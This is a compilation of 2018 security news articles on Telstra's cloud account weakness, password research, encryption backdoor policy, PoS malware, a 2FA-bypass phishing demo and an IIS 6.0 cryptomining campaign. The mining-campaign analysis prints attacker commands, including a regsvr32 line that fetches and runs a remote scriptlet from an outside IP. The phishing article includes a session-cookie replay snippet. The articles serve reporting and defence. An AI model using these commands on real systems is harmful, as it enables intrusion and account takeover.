STE WILLIAMS

Telstra tells cloud customers they’re at risk of malware or worse

UPDATE Telstra has advised users of its cloud who run self-managed resources that their “internet facing servers are potentially vulnerable to malware or other malicious activity.”

The company says that it spotted a weakness in its service on May 4th and is now telling users to “delete or disable” the “TOPS or TIRC account on your self-managed servers”.

The Register has asked Telstra what “TOPS” and “TIRC” accounts allow. But the note sent to customers suggests they’re privileged administrator accounts of some sort.

“We’ve also taken steps to access your account and remove the TOPS or TIRC accounts to minimise the risk on your behalf,” the note says. “We’re still encouraging you to check your account settings and remove/disable any unused accounts as we can’t confirm at this stage if we’ll be successful updating the accounts from our end.”

The letter was sent to users of self-managed servers and advises customers of Telstra-managed servers that they’re in the clear.

At a guess, this sounds like TOPS and TIRC accounts have standard passwords, which have become more widely known than is sensible. And because such accounts appear to be on by default, it is party time for any miscreants who have credentials to unlock them.

And whatever the opposite of party time is at Telstra cloud.
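
For admins on self-managed servers, Telstra's advice amounts to auditing local accounts for the suspect names. A minimal sketch, assuming Linux guests and assuming the accounts appear under the names "tops" or "tirc" in some casing (the exact usernames on Telstra's images are not confirmed):

```python
# Flag suspect accounts in /etc/passwd-format text. The names "tops" and
# "tirc" are assumptions drawn from Telstra's customer note -- verify the
# exact account names on your own servers before acting.
SUSPECT_NAMES = {"tops", "tirc"}

def find_suspect_accounts(passwd_text: str) -> list:
    """Return usernames from passwd-format text that match the watchlist."""
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        username = line.split(":", 1)[0]
        if username.lower() in SUSPECT_NAMES:
            hits.append(username)
    return hits
```

Run it over the contents of /etc/passwd, then disable any hits (for example with usermod -L and a nologin shell) before deleting them, per Telstra's "delete or disable" advice.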

We’ve asked Telstra to detail the situation and will update this story if it offers pertinent information. ®

UPDATE: A Telstra spokesperson told us “Our customers’ security is our number one priority. We identified a weakness, moved quickly to address it and worked closely with our customers to ensure the necessary steps were taken to fully secure their systems.” The spokesperson did not elaborate on the nature of the security SNAFU.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/11/telstra_self_managed_cloud_security_incident/

Bombshell discovery: When it comes to passwords, the smarter students have it figured

Students who get good grades have better passwords than their less academically successful peers, though this finding should be considered alongside several caveats.

JV Roig, consulting director and software developer at Asia Pacific College (APC) in the Philippines, wanted to find out whether school smarts had any bearing on password quality.

So he compared security researcher Troy Hunt’s Have I Been Pwned? data, a list of 320 million exposed password hashes, with password hashes from APC’s 1,252 students.

It turns out that 215 of the student password hashes had a match in Hunt’s database, indicating those students were using unsafe passwords that had been compromised at some point over the past few years.

Roig then grouped the students by GPA to determine whether those with higher GPAs would have fewer compromised passwords.

And indeed, there was some correlation.
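
Roig's comparison can be reproduced in miniature: hash each candidate password with SHA-1 (the format Have I Been Pwned publishes), test membership in the breached-hash set, and compute the compromised rate per group. A toy sketch with invented passwords (note that 215 matches out of 1,252 students works out to the 17.17 per cent population average Roig reports):

```python
import hashlib

def sha1_upper(password: str) -> str:
    """SHA-1 hex digest, uppercased to match the HIBP dump format."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()

def compromised_rate(passwords: list, breached_hashes: set) -> float:
    """Fraction of passwords whose SHA-1 hash appears in the breached set."""
    hits = sum(1 for p in passwords if sha1_upper(p) in breached_hashes)
    return hits / len(passwords)

# Toy data: pretend "password1" appears in the breach corpus.
breached = {sha1_upper("password1")}
students = ["password1", "correct horse battery staple",
            "tr0ub4dor&3", "password1"]
print(f"{compromised_rate(students, breached):.2%}")  # 50.00%
```

The same rate function, applied per GPA bucket instead of to the whole population, yields the group comparisons in the paper.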


“…If we only take into account students with a GPA of at least 3.5, only 12.82 per cent of them use compromised passwords, which compares favorably to the population average of 17.17 per cent,” Roig wrote in a research paper posted to ArXiv on Wednesday. “Looking at students with a minimum GPA of 3.0 results in 15.29 per cent compromised passwords, which is significantly closer to the population average.”

Roig concludes that the academically inclined do seem to have better passwords than peers who don’t score as well in school.

But he cautions that GPA isn’t necessarily a measure of intelligence, that a password can be absent from Hunt’s dataset and still be weak and that the sample population used for this study may be too small to conclude anything and may be biased in some way.

“This shouldn’t be taken as the end-all or be-all of whether smarter people have better passwords, but merely one interesting data point in what could be an interesting series of further experiments,” he said. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/10/smart_people_passwords/

New law would stop feds from demanding encryption backdoor

US lawmakers from both major political parties came together on Thursday to reintroduce a bill that, if passed, would prohibit the US government from forcing tech product makers to undermine the security of their wares.

The bill, known as the Secure Data Act of 2018, was returned to the US House of Representatives by Representatives Zoe Lofgren (D-CA) and Thomas Massie (R-KY), with the support of Jerrold Nadler (D-NY), Ted Poe (R-TX), Ted Lieu (D-CA), and Matt Gaetz (R-FL), cosponsors of a past failed version of the bill from 2014 and of a similarly ill-fated 2015 successor.

In the US Senate in 2014 and 2015, Sen. Ron Wyden (D-OR) sponsored parallel versions of the bill; a Senate equivalent has yet to be floated for this legislative term.


The Secure Data Act forbids any government agency from demanding that “a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency.”

It also prohibits courts from issuing orders to compel access to data.

Covered products include computer hardware, software, or electronic devices made available to the public.

The bill makes an exception for telecom companies, which under the 1994 Communications Assistance for Law Enforcement Act (CALEA) would still have to help law enforcement agencies access their communication networks.

Though not specifically mentioned in the legislative text, this is a bill to protect the integrity of encryption systems.

After the FBI in 2015 faced delays accessing the iPhone used by mass shooter Syed Rizwan Farook, law enforcement officials became more vocal about concerns that encryption can leave investigators in the dark.

Though authorities fought and lost this battle in the early 1990s when they tried to mandate adoption of a backdoored chip, the Clipper Chip, they’ve not conceded. The argument also came up after the September 11 atrocity but was shot down on practical grounds.

But for the last few years the FBI has been pushing for backdoors again. Last month Ray Ozzie, designer of Lotus Notes and former CTO of Microsoft, proposed a similar key escrow scheme, reviving hope among backdoor supporters that security and insecurity can safely coexist. Ozzie’s ideas have been panned by experts.

In a speech on Monday, Attorney General Jeff Sessions said it is “critical that we deal with the growing encryption or the ‘going dark’ problem.”

Thus backdoor skeptics have returned to do battle again.

“Encryption backdoors put the privacy and security of everyone using these compromised products at risk,” said Lofgren in a statement.

“It is troubling that law enforcement agencies appear to be more interested in compelling US companies to weaken their product security than using already available technological solutions to gain access to encrypted devices and services.”

Lofgren argues that encryption backdoors represent a demonstrated security risk and that they harm US companies and jobs by making American tech products less secure and thus less competitive on the global market. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/10/proposed_law_would_stop_feds_from_demanding_backdoors/

17 Zero-Days Found & Fixed in OPC-UA Industrial Protocol Implementations

Vulnerabilities in the framework used for secure data transfer in industrial systems were all fixed by March, says Kaspersky Lab.

Researchers discovered 17 zero-day vulnerabilities in a popular framework for secure data transfer between clients and servers in industrial systems — OPC-UA — and applications that use that framework.

OPC-UA (OPC Unified Architecture) is an updated, more secure version of the OPC protocol, and allows the use of SOAP over HTTPS.

However, Kaspersky Lab ICS CERT released findings today that many implementations of OPC-UA had code design flaws that left them open to denial-of-service and remote code execution attacks. Vulnerabilities were found both in the OPC Foundation’s own applications and in third-party applications that use the OPC-UA Stack.

All vulnerabilities were reported to developers, and were fixed as of March, according to Kaspersky Lab. See the full report here.

 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/17-zero-days-found-and-fixed-in-opc-ua-industrial-protocol-implementations/d/d-id/1331775?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Phishing Attack Bypasses Two-Factor Authentication

Hacker Kevin Mitnick demonstrates a phishing attack designed to abuse multi-factor authentication and take over targets’ accounts.

Businesses and consumers around the world are encouraged to adopt two-factor authentication as a means of strengthening login security. But 2FA isn’t ironclad: attackers are finding ways to circumvent the common best practice. In this case, they use social engineering.

A new exploit, demonstrated by KnowBe4 chief hacking officer Kevin Mitnick, lets threat actors access target accounts with a phishing attack. The tool to do this was originally developed by white hat hacker Kuba Gretzky, who dubbed it evilginx and explains it in a technical blog post.

It starts with typosquatting, a practice in which hackers create malicious URLs designed to look similar to websites people know. Mitnick starts his demo by opening a fake email from LinkedIn and points out its origin is “llnked.com” – a misspelling people will likely overlook.

Those who fall for the trick and click the email’s malicious link are redirected to a login page where they enter their username, password, and eventually an authentication code sent to their mobile device. Meanwhile, the attacker can see a separate window where the victim’s username, password, and a different six-digit code are displayed.

“This is not the actual 6-digit code that was intercepted, because you can’t use the 6-digit code again,” Mitnick says in the demo. “What we were able to do was intercept the session cookie.”

With the session cookie, an attacker doesn’t need a username, password, or second-factor code to access your account. They can simply enter the session key into the browser and act as you. All they have to do is paste the stolen session cookie into Developer Tools and hit Refresh.
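
Mechanically, the replay step is just sending the stolen cookie with your own requests; pasting it into Developer Tools is one route, but any HTTP client works. A minimal illustration using Python's standard library (the cookie name `SESSIONID`, its value, and the URL are placeholders, not values from the demo):

```python
import urllib.request

# A session cookie captured by the phishing proxy (placeholder value).
stolen_cookie = "SESSIONID=9f8e7d6c5b4a"

# Attaching the cookie makes the server treat this request as the victim's
# already-authenticated session -- no username, password, or 2FA code needed.
req = urllib.request.Request("https://example.com/account")
req.add_header("Cookie", stolen_cookie)

# urllib.request.urlopen(req) would now ride the victim's session.
```

This is why session cookies deserve the same protection as passwords: whoever holds one is, as far as the server can tell, the logged-in user.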

It’s not the first time 2FA has been hacked, says Stu Sjouwerman, founder and CEO at KnowBe4. “There are at least ten different ways to bypass two-factor authentication,” he explains in an interview with Dark Reading. “They’ve been known about but they aren’t necessarily well-published … most of them are flying under the radar.”

These types of exploits are usually presented as concepts at conferences like Black Hat. Mitnick’s demo puts code into context so people can see how it works. This can be used for any website but an attacker will need to tweak the code depending on how they want to use it.

To show how the exploit can make any site malicious, Sjouwerman sent me an email tailored to look like it came from Kelly Jackson Higgins, reporting a typo in an article of mine:

When I clicked the link, I ultimately ended up on Dark Reading but was first redirected to a site owned by the “attacker” (Sjouwerman). In a real attack scenario, I could have ended up on a truly malicious webpage where the hacker could launch several different attacks and attempt to take over my machine. Sjouwerman sent a screenshot of what he saw while this happened:

The screenshot shows the email’s event types progressing from processed, to deferred, to delivered, to opened.

“You need to be a fairly well-versed hacker to do this – to get it set up and have the code actually working,” he notes. This is a one-on-one attack and can’t be scaled to hit a large group of people at the same time. However, once the code works, the attack is fairly simple to pull off.

“You need to have user education and training, that’s a no-brainer, but you also have to conduct simulated phishing attacks,” Mitnick says in his demo.

Sjouwerman emphasizes the importance of putting employees through “new school” security awareness training, as opposed to the “death by PowerPoint” that many employees associate with this type of education. Instead of putting them through presentations, he recommends sending them phishing attacks and conducting online training in the browser.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/endpoint/phishing-attack-bypasses-two-factor-authentication/d/d-id/1331776?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Author of TreasureHunter PoS Malware Releases Its Source Code

Leak gives threat actors a way to build newer, nastier versions of the point-of-sale malware, Flashpoint says.

In a development that could spell trouble for point-of-sale (PoS) operators, the author of TreasureHunter, a point-of-sale malware family that has been circulating in the wild since at least 2014, has released source code for the malware.

Along with it, the threat actor has also released code for TreasureHunter’s graphical user interface builder and the malware’s administrator panel, security vendor Flashpoint said in an advisory this week.

The code release, in a leading Russian underground forum, has given security researchers fresh insight into the malware, which they have had to reverse engineer up to this point in order to analyze.  

Vitali Kremez, director of research at Flashpoint, says the code has provided some unique insight into the coders’ mindset and operational style. Flashpoint, in collaboration with security researchers from Cisco Talos, has already been able to use the leaked code to improve protections around the malware and to be able to quickly disrupt potential copycat versions of it.

At the same time, the open availability of TreasureHunter code in a popular underground forum lowers the bar for other threat actors to build new and potentially more sophisticated versions of the PoS malware, Kremez says.

“Based on our intelligence, this malware was linked to quite a few breaches [perpetrated by] Russian-speaking criminal groups targeting small-sized and medium-sized retailers,” Kremez says. But the full source code was up to now reserved for BearsInc, a notorious Russian-speaking group that specializes in selling stolen card data via low-tier and midtier hacking and carding communities.

Flashpoint says its researchers have already observed Russian-speaking threat actors discussing ways to improve and weaponize TreasureHunter in new ways. How exactly malware authors will use the code to improve TreasureHunter remains unclear. “Likely, cybercriminals would work on improving [the malware’s] communication protocol” and adding more functionality to it, Kremez says.

The leaked code shows that the original author planned to tweak various features of the malware, including its anti-debugging capabilities and communication logic. The code also contains a long list of “to-do” items and suggestions for improving the overall functionality of TreasureHunter.

What is not clear at the moment is why exactly the Russian-speaking author of the malware decided to leak its source code publicly. “We hypothesize it is likely they did this in [an] attempt to distance themselves from being unique malware code owners,” says Kremez. Often, threat actors resort to the tactic to frustrate efforts by law enforcement investigators and security researchers to attribute attacks and malware to specific threat actors and groups.

For instance, in September 2016, the three authors of Mirai — one of whom was a former Rutgers University student — decided to publicly release its source code after infecting hundreds of thousands of Internet of Things devices worldwide with the malware. Prosecutors described the leak as an attempt by the trio to cover their tracks and to build plausible deniability of their direct connection to the malware.

Threat actors later took advantage of the leaked Mirai code to build multiple versions of the malware, including one that was responsible for disrupting services at DNS provider Dyn and numerous other major Internet companies.

A similar leak of the Zeus banking Trojan code back in 2011 resulted in multiple more-dangerous versions of the malware becoming available soon after. “PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware, which led to the creation of the ProPoS and Katrina variants,” Kremez wrote in the Flashpoint blog post announcing the code leak this week.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/author-of-treasurehunter-pos-malware-releases-its-source-code-/d/d-id/1331778?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Electroneum Cryptomining Targets Microsoft IIS 6.0 Vulnerability


New campaign shows that there are still systems exposed to the year-old CVE-2017-7269 vuln on an operating system that was declared end-of-life three years ago.

F5 researchers recently noticed a new campaign exploiting a year-old vulnerability in Microsoft Internet Information Services (IIS) 6.0 servers to mine Electroneum cryptocurrency. The same IIS vulnerability (CVE-2017-7269) was reported last year by ESET security researchers to have been abused to mine Monero and to launch targeted attacks against organizations by the notorious “Lazarus” group, which is widely believed to consist of North Korean government hackers.

This latest campaign shows that there are still systems exposed to this year-old vulnerability on an operating system that was declared end-of-life (EoL) three years ago. The flaw, a buffer overflow in the WebDAV functionality of IIS 6.0, was publicly disclosed in March 2017; on successful exploitation, it allows remote code execution. Upon release, it was reported that the vulnerability was already being exploited in the wild, and within two days a proof-of-concept (PoC) exploit was published.

Shellcode Analysis

The exploit in this campaign is identical to the original proof-of-concept (PoC) exploit published in March 2017, but it embeds a different shellcode to execute the attacker’s commands. The shellcode itself is ASCII shellcode containing a Return-Oriented Programming (ROP) chain. ASCII shellcode is machine code that consists entirely of printable ASCII or Unicode characters, which allows an attacker to bypass input restrictions. The ROP exploitation technique composes shellcode from instructions already loaded into memory, called “gadgets,” instead of writing and executing additional external code in memory. This allows attackers to bypass security mechanisms such as executable space protection and code signing.
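
The defining property of ASCII shellcode is that every byte doubles as a printable character, which is what lets it slip past filters that reject raw binary. A quick check for that property (a toy illustration, not the shellcode from this campaign):

```python
def is_ascii_shellcode(payload: bytes) -> bool:
    """True if every byte is printable ASCII (0x20-0x7e), the property
    that lets such shellcode pass printable-input filters."""
    return all(0x20 <= b <= 0x7e for b in payload)

print(is_ascii_shellcode(b"PYIIIIII"))      # True  - printable bytes only
print(is_ascii_shellcode(b"\x90\x90\xcc"))  # False - raw binary bytes
```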

The execution of this shellcode results in opening a reverse shell to a malicious remote server. A reverse shell is a type of shell in which the target machine communicates back to the attacker’s remote machine and waits for the attacker to send shell commands.

Once the compromised server is connected to the attacker’s remote machine, it will automatically receive and execute two commands.

Image Source: F5

First Command

CD /d %WinDir%\Temp
Net Stop SharedAccess /Y

The Net Stop command stops the “Internet Connection Firewall (ICF)” service (SharedAccess), which, if present, may block outgoing communication from the compromised machine.

Second Command

TaskKill /IM RegSvr32.exe /f
Start RegSvr32.exe /s /n /u /i:http://117.79.132.174/images/test.sct scrobj.dll

Here, the attacker is using a technique named “Squiblydoo” to bypass software whitelisting protection by executing attacker commands with a legitimate Microsoft binary. It allows the attacker to fetch and execute a remote Extensible Markup Language (XML) file that contains “scriptlets” holding the attacker’s code of choice, using the legitimate, signed “regsvr32” Windows binary. This binary is proxy aware, uses Transport Layer Security (TLS) encryption, and follows redirects.
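
Because Squiblydoo rides a signed Microsoft binary, file-based whitelisting won't flag it, but the command line is distinctive: regsvr32 invoked with /i: pointing at a remote URL plus scrobj.dll. A detection sketch over captured process command lines (the matching heuristic is ours, not from the F5 write-up):

```python
import re

# Heuristic: regsvr32 invoked with a remote scriptlet URL via scrobj.dll.
SQUIBLYDOO_RE = re.compile(
    r"regsvr32(\.exe)?\s+.*?/i:\s*https?://\S+.*scrobj\.dll",
    re.IGNORECASE,
)

def looks_like_squiblydoo(cmdline: str) -> bool:
    """Flag command lines matching the Squiblydoo regsvr32 pattern."""
    return bool(SQUIBLYDOO_RE.search(cmdline))
```

Feeding it the Start RegSvr32.exe line from this campaign returns True, while ordinary local regsvr32 registrations do not match.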

Executing the Scriptlets

The downloaded XML file, named “test.sct,” contains Visual Basic Script (VBScript) scriptlets that hold the attacker’s commands. The VBScript still had the attacker’s comments embedded.

Updating the Malware

If the attacker compromised the server previously, the script will stop and replace the old binary file with a new one before execution. The script tries to terminate a process of a specific file named “lsass.eXe” that is located in the Windows OS folder under the path “/System32/Temp.”

The name “lsass.eXe” was chosen to mask the malicious file as a legitimate “lsass” process, a critical part of Windows.  To make sure that the process terminates before the script tries to delete the file, the attacker uses the “ping” command to delay script execution. Our assumption is that the attacker chose the “ping” command over the “sleep” command because it is less suspicious. The “sleep” command appears to be commented out.

After performing these commands, the script creates a new file in the same location with the same name using the binary data from the Base64 string and executes it.

Getting Persistence as RPC Service

The script tries to register the execution command as an “RpcRemote” service to launch itself upon every system startup, which grants persistence on the target. The name “RpcRemote” was chosen to make it look like a legitimate component of the operating system.

Mining Electroneum

By looking at the command line executed by the script, we assume that the executable file is a cryptocurrency miner. The clues are the “-p” and “-u” arguments, the “stratum+tcp://” address, and the long wallet address starting with the letters “etn,” implying the Electroneum (ETN) crypto-coin. The file itself is a 32-bit version of a cryptocurrency miner called XMRig (2.5.2), packed using the “Ultimate Packer for Executables” (UPX) packer.

The execution command instructs the miner to mine the Electroneum crypto-currency using several pools simultaneously to this wallet:

etnjzC1mw32gSBsjuYgwWKH5fZH6ca45MDxi6UwQQ9C8GJErY3rVrqJA8sDtPKMJXsPuv4vdSyDzGVTVqgAh97GT8smQMoUaQn
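
The attribution clues listed above — the stratum+tcp:// pool address, the -u wallet argument, the etn prefix — can be pulled out of a captured command line mechanically. A sketch (the command line below is a constructed example, not the one from the campaign):

```python
import re

def extract_mining_indicators(cmdline: str) -> dict:
    """Pull pool URLs and an Electroneum-style wallet from a miner command line."""
    pools = re.findall(r"stratum\+tcp://\S+", cmdline)
    wallet = re.search(r"-u\s+(etn\w+)", cmdline)
    return {
        "pools": pools,
        "wallet": wallet.group(1) if wallet else None,
        # The "etn" prefix is Electroneum's wallet-address convention.
        "is_electroneum": wallet is not None,
    }

example = ("miner.exe -o stratum+tcp://pool.example.com:3333 "
           "-u etnExampleWallet123 -p x")
print(extract_mining_indicators(example))
```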

At the time of writing, the attacker has earned roughly $99 from the campaign across both pools. This is a very small amount given how lucrative most other crypto-mining campaigns currently are, making this campaign appear unsuccessful. One theory is that the attacker changes the wallet address from time to time. Another is that there aren’t many exploitable IIS 6.0 servers left.

But although these attackers haven’t made much money on this campaign yet, we encourage businesses to abandon the use of EOL software in every instance possible. When that’s not feasible, we recommend patching any critical vulnerability immediately upon release of the patch. If patching is not possible, there are many compensating controls that can be implemented depending on your security control framework such as blocking attacks with a Web Application Firewall (WAF), or not allowing vulnerable legacy systems to touch the internet.

For more details, click here.

Get the latest application threat intelligence from F5 Labs.

F5 makes apps go-faster, smarter, and safer. With solutions for the cloud and the data center, F5 technology provides unparalleled visibility and control, allowing customers to secure their users, applications, and data. For more information, visit www.f5.com. View Full Bio

Article source: https://www.darkreading.com/partner-perspectives/f5/electroneum-cryptomining-targets-microsoft-iis-60-vulnerability-/a/d-id/1331752?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Ready or Not: Transport Layer Security 1.3 Is Coming

Better encryption could mean weaker security if you’re not careful.

Transport Layer Security (TLS) protocols enable secure network communications and support everything from e-commerce to email. TLS 1.3 — the latest update to the ubiquitous SSL/TLS encryption protocol — is in the final stages of ratification and will become official soon. This new encryption standard will offer substantial security and performance benefits. The question for security teams is — are you ready?

Rest assured, the day TLS 1.3 is official won’t be a “Y2K bug” moment for encrypted traffic — and for everyday Web users, the update will likely go unnoticed. However, for security teams, the time to prepare for the new standard is now.

The Internet Engineering Task Force (IETF), which governs the standard, recently announced approval of the 28th draft of TLS 1.3, and many in the Internet ecosystem will likely be aggressive in rolling it out. However, adoption will vary by geography, industry, and business model. For example, industries that rely on high Web traffic, such as online retailers and news sites, may be slower to adopt the new standard because they don’t want to turn away site visitors using unsupported browsers. Other companies, especially those in highly regulated industries, may insist on a higher level of security protection when employees interact with external sites, send email, or transfer files.

The high-security encryption gained from TLS 1.3 comes at a critical time because the challenges of cyber defense have never been greater. Malicious actors continually look for new ways to carry out attacks, and they’re well aware that encryption affords an easy path to avoid protective measures. Consequently, Gartner predicts that in 2019 “more than 50% of new malware campaigns will use various forms of encryption to conceal delivery and ongoing communications, including data exfiltration.” 

Determining TLS 1.3 Readiness
Organizations should always aspire to achieve the best possible security posture, as long as no other risks are introduced. And although TLS 1.3 will offer substantial security benefits, there are factors to consider before adopting the standard. In fact, many organizations have existing network security architectures in place that are fine-tuned to deal with the world as it is, and changing the strength of encryption can create challenges.

Having highly secure sessions without compromising the protection offered by existing network security tools is tricky because encryption hides the traffic it is designed to inspect; encrypted traffic, whether it is private data or malware, is all hidden from most standard security systems. A straightforward and effective way to avoid being blinded to malicious traffic is with an encrypted traffic management application that physically (or virtually) resides within the network and facilitates a view of decrypted traffic to a wide variety of security tools. However, what many have found is that the security solutions that allow SSL visibility and enable security inspection vary greatly in their ability to provide visibility while simultaneously maintaining the privacy and security integrity of the session.

When a client-server session is established with an encrypted traffic management application residing in the middle, all parties must work in harmony for seamless connectivity. When a tool in the middle cannot support the high-level encryption preferences of the client and server, one of three choices must be made:

1. Block the traffic, which leads to a poor user experience;

2. Allow the encrypted traffic without inspection, which results in a decreased security posture; or

3. Degrade the session to a lower security connection that is supported by both client and server. For example, changing the session to an earlier version (TLS 1.2 or TLS 1.1) or dropping from a strong cipher suite (such as one that provides perfect forward secrecy) to a weaker one.

For practical reasons, degrading session security is the choice most enterprises make, affording a positive user experience with some inspection capability. However, it is still a compromise because it means sacrificing encryption strength in exchange for increased visibility for inspection tools. Ideally, choices like this should not have to be made.
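
One concrete way to see the trade-off from the client side: Python's ssl module lets you pin a protocol floor, so a middlebox that only speaks older versions fails loudly instead of silently degrading the session (a minimal sketch; TLS 1.3 support additionally requires an OpenSSL 1.1.1+ build underneath):

```python
import ssl

# Build a client context that refuses to negotiate below TLS 1.2, so a
# middlebox cannot quietly downgrade the session to TLS 1.1 or older.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2

# create_default_context() also validates server certificates by default
# (verify_mode == CERT_REQUIRED), a second guard against interception.
assert ctx.minimum_version == ssl.TLSVersion.TLSv1_2
assert ctx.verify_mode == ssl.CERT_REQUIRED
```

An inspection appliance sitting in the path must then either genuinely support TLS 1.2+ or block the connection — the silent-degrade option disappears.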

Taking the Right Steps
To best prepare for TLS 1.3, security teams must inspect their current approach and determine how change will affect it. Here are some questions to consider:

  • Is decrypted traffic currently being inspected?
  • Will changes in the new standard affect the performance of that inspection or add pressure to the network?
  • Will we need to re-architect to accommodate the new standard?

Companies with network security tools in place (intrusion-prevention systems, next-gen firewall, sandboxes, forensics, etc.) that are not inspecting traffic should conduct a risk assessment and develop a plan to create secure and compliant inspection of potential hidden threats. It’s also important to engage cross-functional partners early (including network, security, and compliance teams) to be sure that the plan addresses any encryption blind spots. 

Those with inspection capability in place should determine if the current solution meets requirements for secure decryption for earlier SSL/TLS protocols. Organizations will need to inspect less-secure traffic (e.g., TLS 1.2), and it’s important they do so without introducing new security risks. A thorough assessment should help them determine if their inspection solution has strong ciphers and mirror client ciphers, validates certificates, and demonstrates protection against known vulnerabilities.

Finally, organizations should determine if it’s possible to enable inspection while preserving the strong security benefits of TLS 1.3. An inspection solution will need to support a new handshake mechanism and must support the limited number of cipher suites required for TLS 1.3. These ciphers are much stronger and offer greater protection against replay attacks. To fully enjoy these benefits, a full handshake must be enabled.

By taking these steps, your organization can help get ready for when TLS 1.3 arrives and avoid having to make trade-offs involving user experience, encryption strength, and inspection capabilities.


In his role as vice president of product strategy and operations, Mark helps major enterprises navigate the evolving technology landscape to address key business and security issues. Mark joined Symantec via the Blue Coat acquisition, where he led product strategy … View Full Bio

Article source: https://www.darkreading.com/endpoint/ready-or-not-transport-layer-security-13-is-coming/a/d-id/1331753?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

As Personal Encryption Rises, So Do Backdoor Concerns

Geopolitical changes drive personal encryption among security pros, who are increasingly worried about encryption backdoors.

More security pros are embracing personal encryption in response to recent political changes, according to a new Venafi report. At the same time, they’re increasingly wary of encryption backdoors as attackers become more sophisticated.

Researchers collected their data at the 2018 RSA Conference, where they polled more than 500 attendees on their response to geopolitical changes. Sixty-four percent of respondents said their personal encryption usage had increased as a result, compared with 45% at RSAC 2017.

Results also indicated a growing wariness of encryption backdoors. The majority (84%) of participants are more worried about backdoors in 2018, compared with 73% who expressed this concern last year. Over the past 12 months, the report notes, there have been many comments and legislative suggestions proposing mandated encryption backdoors.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/as-personal-encryption-rises-so-do-backdoor-concerns/d/d-id/1331773?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Risky Business: Deconstructing Ray Ozzie’s Encryption Backdoor

With the addition of secure enclaves, secure boot, and related features of “Clear,” the only ones that will be able to test this code are Apple, well-resourced nations, and vendors who sell jailbreaks.

Recently, Ray Ozzie proposed a system for a backdoor into phones that he claims is secure. He’s dangerously wrong.

According to Wired, the goal of Ozzie’s design, dubbed “Clear,” is to “give law enforcement access to encrypted data without significantly increasing security risks for the billions of people who use encrypted devices.” His proposal increases risk to computer users everywhere, even without it being implemented. Were it implemented, it would add substantially more risk.

It increases risk even before implementation because only a limited number of people perform deep crypto or systems analysis, and several of us are now writing about Ozzie’s bad idea rather than doing other, more useful work.

We’ll set aside, for a moment, the cybersecurity talent gap and look at the actual plan. The way a phone stores your keys today looks something like the very simplified Figure 1. There’s a secure enclave inside your phone. It talks to the kernel, providing it with key storage. Importantly, the dashed lines in this figure are trust boundaries, where the designers enforce security rules.

Source: Adam Shostack

Under the Clear proposal, when you generate a passphrase, an encrypted copy of that passphrase is stored in a new storage enclave. Let’s call that the police enclave. The code that accepts passphrase changes gets a new set of modules to store that passphrase in the police enclave. (Figure 2 shows the added components in orange.) Now that code, already complex because it manages Face ID, Touch ID, corporate rules about passphrases, and perhaps other things, has to make additional calls to a new module, and those calls have to be made securely. We’ll come back to how risky that is. But right now, I want to mention a set of bugs, lock screen vulnerabilities, and issues, not to criticize Apple, but to point out that this code is hard to get right, even before we multiply the complexity involved.

There’s also a new police user interface on the device, which allows you to enter a different passphrase of some form. The passcode validation functions also get more complex. There’s a new lockdown module which, realistically, is going to be accessible from your lock screen. If it’s not accessible from the lock screen, then someone can remote-wipe the phone. So, entering a passcode shared with a few million police, secret police, border police, and bloggers around the globe will irrevocably brick your phone. I guess if that’s a concern, you can just cooperatively unlock it.

Source: Adam Shostack

Lastly, there’s a new set of off-device communications that must be secured. These communications are complex, involving new network protocols with new communications partners, linked by design to be able to access some very sensitive keys, implemented in all-new code. It also involves setting up relationships with, likely, all 193 countries in the United Nations, possibly save the few where US companies can’t operate. There are no rules against someone bringing an iPhone to one of those countries, and so cellphone manufacturers may need special dispensation to do business with each one.

Apple has been criticized for removing apps from the App Store in China, and that precedent suggests Apple’s “evaluate” routine may differ from country to country, making the code more complex still.

The Trusted Computing Base
There’s an important concept, now nearly 40 years old, of a trusted computing base, or TCB. The idea is that all code has bugs, and bugs in security systems lead to security consequences. A single duplicated line of code (“goto fail;”) led to failures of SSL, and that was in highly reviewed code. Therefore, we should limit the size and complexity of the TCB to allow us to analyze, test, and audit it. Back in the day, the trusted kernels were on the order of thousands of lines of code, which was too large to audit effectively. My estimate is that the code to implement this proposal would add at least that much code, probably much more, to the TCB of a phone.
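To make the “goto fail” point concrete, here is a loose Python analogue of that bug (the original was C in Apple’s SecureTransport; the function and argument names here are invented for illustration): one duplicated cleanup line makes the real check unreachable, so verification always “succeeds.”

```python
def verify_signed_key_exchange(hash_ok: bool, signature_ok: bool) -> int:
    """Loose Python analogue of the duplicated-line 'goto fail' bug.

    Returns 0 for success, nonzero for failure (mimicking C conventions).
    """
    err = 0
    if not hash_ok:
        err = -1
        return err
    return err               # duplicated "success" exit: always taken
    # Everything below is dead code -- the signature check never runs.
    if not signature_ok:
        err = -1
        return err
    return err

# A forged signature still "verifies" because the real check is unreachable:
print(verify_signed_key_exchange(hash_ok=True, signature_ok=False))  # -> 0
```

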